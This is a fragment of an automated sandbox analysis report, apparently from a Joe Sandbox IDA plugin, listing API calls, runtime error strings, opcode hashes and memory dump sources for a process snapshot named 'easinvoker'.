                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectQuery
                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
                                                                                                  • API String ID: 1027372294-974437099
                                                                                                  • Opcode ID: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
                                                                                                  • Instruction ID: d1b4ddb9884753ba9f060f2ad50529926f9c9f07c0d7013e73f46a45df094a5d
                                                                                                  • Opcode Fuzzy Hash: ac37564a0943cd9c4829d9f00c113f258bab8429c18220a49573c59559e13634
                                                                                                  • Instruction Fuzzy Hash: C471CD76B11A24C6EB01CB66E94078A7772B744FACF08C115CD1F27358DB3AC905E382
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 613C1AC5
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 613C1AD0
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 613C1AD8
                                                                                                  • GetTickCount.KERNEL32 ref: 613C1AE0
                                                                                                  • QueryPerformanceCounter.KERNEL32 ref: 613C1AED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 1445889803-0
                                                                                                  • Opcode ID: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
                                                                                                  • Instruction ID: 414e8fcb770a865792631034dca2ba3ece076a107bf7b4a66efec48a9980259e
                                                                                                  • Opcode Fuzzy Hash: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
                                                                                                  • Instruction Fuzzy Hash: DE11B233712A6082FB109B25F808385B261B788BE4F0C4235DD5F13BA4DA3DCA958340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • VirtualQuery failed for %d bytes at address %p, xrefs: 613C1691
                                                                                                  • Address %p has no image-section, xrefs: 613C1557, 613C16A2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.546249650.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.546237759.00000000613C0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546264583.00000000613C4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546274327.00000000613C8000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546285084.00000000613C9000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.546299928.00000000613CD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_613c0000_easinvoker.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: QueryVirtual
                                                                                                  • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                  • API String ID: 1804819252-157664173
                                                                                                  • Opcode ID: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
                                                                                                  • Instruction ID: 1549435389f1d83eb98944755ae3b0791324c1eeac1aff2d4bd9f122e5cf5d3c
                                                                                                  • Opcode Fuzzy Hash: ceb095db029ccd83e1a4bc7a7c806a4770a528e67f66955d3a5e886fd59690f7
                                                                                                  • Instruction Fuzzy Hash: BD31EF77701A64D5EA119F16EC00B957B76B788FE8F0C8125EE1E17350DB39CA52C780
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%